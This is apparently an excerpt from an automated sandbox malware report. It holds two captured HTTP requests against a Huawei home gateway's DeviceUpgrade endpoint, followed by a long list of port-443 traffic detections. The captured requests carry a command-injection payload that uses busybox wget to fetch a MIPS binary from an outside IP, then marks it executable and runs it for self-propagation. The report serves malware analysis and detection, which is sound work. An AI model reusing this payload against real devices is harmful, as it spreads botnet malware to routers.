Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: global traffic	HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: /Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 34 39 2e 31 32 2e 32 33 33 2e 35 32 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 35 39 36 61 39 36 63 63 37 62 66 39 31 30 38 63 64 38 39 36 66 33 33 63 34 34 61 65 64 63 38 61 2f 64 62 30 66 61 34 62 38 64 62 30 33 33 33 33 36 37 65 39 62 64 61 33 61 62 36 38 62 38 30 34 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 49.12.233.52 -l /tmp/.hiroshima -r /596a96cc7bf9108cd896f33c44aedc8a/db0fa4b8db0333367e9bda3ab68b8042.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 46356
Source: unknown	Network traffic detected: HTTP traffic on port 41058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 44404 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 38140 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 41792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45142
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56158
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50970
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34248
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50852
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59428
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33288
Source: unknown	Network traffic detected: HTTP traffic on port 60838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34012
Source: unknown	Network traffic detected: HTTP traffic on port 47350 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33598 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33288 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51708
Source: unknown	Network traffic detected: HTTP traffic on port 59608 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50746
Source: unknown	Network traffic detected: HTTP traffic on port 33380 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45370
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43192
Source: unknown	Network traffic detected: HTTP traffic on port 59690 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39932
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33388
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58234
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36656
Source: unknown	Network traffic detected: HTTP traffic on port 40030 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35692
Source: unknown	Network traffic detected: HTTP traffic on port 51708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 43950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 44588 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50852 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51608
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44030
Source: unknown	Network traffic detected: HTTP traffic on port 60208 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54460 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35318
Source: unknown	Network traffic detected: HTTP traffic on port 55694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50750
Source: unknown	Network traffic detected: HTTP traffic on port 38816 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56158 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36888
Source: unknown	Network traffic detected: HTTP traffic on port 49658 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58364 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58364
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33380
Source: unknown	Network traffic detected: HTTP traffic on port 53856 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59690
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55092
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43058
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 46204
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50402
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44260
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45472
Source: unknown	Network traffic detected: HTTP traffic on port 53890 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42658 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58006
Source: unknown	Network traffic detected: HTTP traffic on port 36978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34214
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35666
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38812
Source: unknown	Network traffic detected: HTTP traffic on port 35596 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 48916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34462
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38816
Source: unknown	Network traffic detected: HTTP traffic on port 45306 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 46356 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60208
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60566
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48854
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50810
Source: unknown	Network traffic detected: HTTP traffic on port 50418 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58006 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51490 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 48814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56118
Source: unknown	Network traffic detected: HTTP traffic on port 36656 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37682
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37320
Source: unknown	Network traffic detected: HTTP traffic on port 59596 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56116
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57206
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38646
Source: unknown	Network traffic detected: HTTP traffic on port 50920 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39618
Source: unknown	Network traffic detected: HTTP traffic on port 36290 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60616
Source: unknown	Network traffic detected: HTTP traffic on port 48230 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49658
Source: unknown	Network traffic detected: HTTP traffic on port 41598 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45178
Source: unknown	Network traffic detected: HTTP traffic on port 44348 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47350
Source: unknown	Network traffic detected: HTTP traffic on port 47958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 48720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36224
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38636
Source: unknown	Network traffic detected: HTTP traffic on port 56134 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56134
Source: unknown	Network traffic detected: HTTP traffic on port 46484 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 36888 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57220
Source: unknown	Network traffic detected: HTTP traffic on port 40086 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48310
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 46374
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47460
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 46490
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58318
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37660
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37540
Source: unknown	Network traffic detected: HTTP traffic on port 34878 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 35652 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56016
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36446
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35246
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57596
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56260
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56140
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38628
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57350
Source: unknown	Network traffic detected: HTTP traffic on port 50970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 46484
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38982
Source: unknown	Network traffic detected: HTTP traffic on port 56344 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51930
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39954
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50962
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56028
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50720
Source: unknown	Network traffic detected: HTTP traffic on port 53170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56432 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36316
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35596
Source: unknown	Network traffic detected: HTTP traffic on port 47026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53340 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60880
Source: unknown	Network traffic detected: HTTP traffic on port 38000 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 37320 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34508 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 52632 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 46236
Source: unknown	Network traffic detected: HTTP traffic on port 48140 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50420 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 36316 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36150
Source: unknown	Network traffic detected: HTTP traffic on port 39932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52632
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38328
Source: unknown	Network traffic detected: HTTP traffic on port 59720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40888
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59274
Source: unknown	Network traffic detected: HTTP traffic on port 41898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53856
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48486
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37590
Source: unknown	Network traffic detected: HTTP traffic on port 45452 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56116 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 46714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51794
Source: unknown	Network traffic detected: HTTP traffic on port 40188 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52400
Source: unknown	Network traffic detected: HTTP traffic on port 33388 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60024
Source: unknown	Network traffic detected: HTTP traffic on port 44504 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 60566 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57206 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59274 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35290
Source: unknown	Network traffic detected: HTTP traffic on port 36832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57636 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 35290 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47026
Source: unknown	Network traffic detected: HTTP traffic on port 51608 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48110
Source: unknown	Network traffic detected: HTTP traffic on port 44108 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48230
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60040
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38672
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37340
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47140
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39760
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38556
Source: unknown	Network traffic detected: HTTP traffic on port 41944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 44550 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39636
Source: unknown	Network traffic detected: HTTP traffic on port 47862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 40888 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 56346 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60274
Source: unknown	Network traffic detected: HTTP traffic on port 56218 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53200 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60030
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35282
Source: unknown	Network traffic detected: HTTP traffic on port 45142 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 62455
Source: unknown	Network traffic detected: HTTP traffic on port 56850 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54394 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43454 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47372
Source: unknown	Network traffic detected: HTTP traffic on port 39954 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55810
Source: unknown	Network traffic detected: HTTP traffic on port 50150 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33886 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49264 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53634
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39874
Source: unknown	Network traffic detected: HTTP traffic on port 45654 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 35158
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 33098
Source: unknown	Network traffic detected: HTTP traffic on port 47840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41944
Source: unknown	Network traffic detected: HTTP traffic on port 40084 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50418
Source: unknown	Network traffic detected: HTTP traffic on port 40258 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 37340 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49264
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53800
Source: unknown	Network traffic detected: HTTP traffic on port 39618 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37048
Source: unknown	Network traffic detected: HTTP traffic on port 41048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 44910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59596
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57296
Source: unknown	Network traffic detected: HTTP traffic on port 56894 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57050
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43950
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53814
Source: unknown	Network traffic detected: HTTP traffic on port 55616 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43200 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 39874 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38000
Source: unknown	Network traffic detected: HTTP traffic on port 54988 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 47140 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50420
Source: unknown	Network traffic detected: HTTP traffic on port 60616 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 59246
Source: unknown	Network traffic detected: HTTP traffic on port 47372 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33610 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43058 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34248 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 44910
Source: unknown	Network traffic detected: HTTP traffic on port 36610 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 47932 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54370 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53946
Source: unknown	Network traffic detected: HTTP traffic on port 48486 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 33782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 36290
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39440
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50790
Source: unknown	Network traffic detected: HTTP traffic on port 56998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39566
Source: unknown	Network traffic detected: HTTP traffic on port 39372 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34610 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 37048 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 32992 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57220 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41992
Source: unknown	Network traffic detected: HTTP traffic on port 41202 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 35318 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 35666 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34214 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52624
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49598
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48388
Source: unknown	Network traffic detected: HTTP traffic on port 55744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 40060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 38328 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 59428 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48144
Source: unknown	Network traffic detected: HTTP traffic on port 56766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 47296
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 37252
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48140
Source: unknown	Network traffic detected: HTTP traffic on port 55370 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 48260
Source: unknown	Network traffic detected: HTTP traffic on port 48722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42362 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 51394 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 36224 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 41984
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 42952
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 60006
Source: unknown	Network traffic detected: HTTP traffic on port 55092 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 43222 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57296 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 40370
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39022
Source: unknown	Network traffic detected: HTTP traffic on port 46236 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 55744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 38056
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53200
Source: unknown	Network traffic detected: HTTP traffic on port 42470 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56956
Source: unknown	Network traffic detected: HTTP traffic on port 45804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 34920
Source: unknown	Network traffic detected: HTTP traffic on port 47642 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 32990
Source: unknown	Network traffic detected: HTTP traffic on port 46374 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51394
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 43992
Source: unknown	Network traffic detected: HTTP traffic on port 50790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 37908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 54396 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 45370 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 39372
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56608
Source: unknown	Network traffic detected: HTTP traffic on port 35968 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50962 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 52366
Source: unknown	Network traffic detected: HTTP traffic on port 38386 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 51032
Source: unknown	Network traffic detected: HTTP traffic on port 38982 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 53402 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 35246 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 34012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 56850
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 42658
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 53340
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 45804
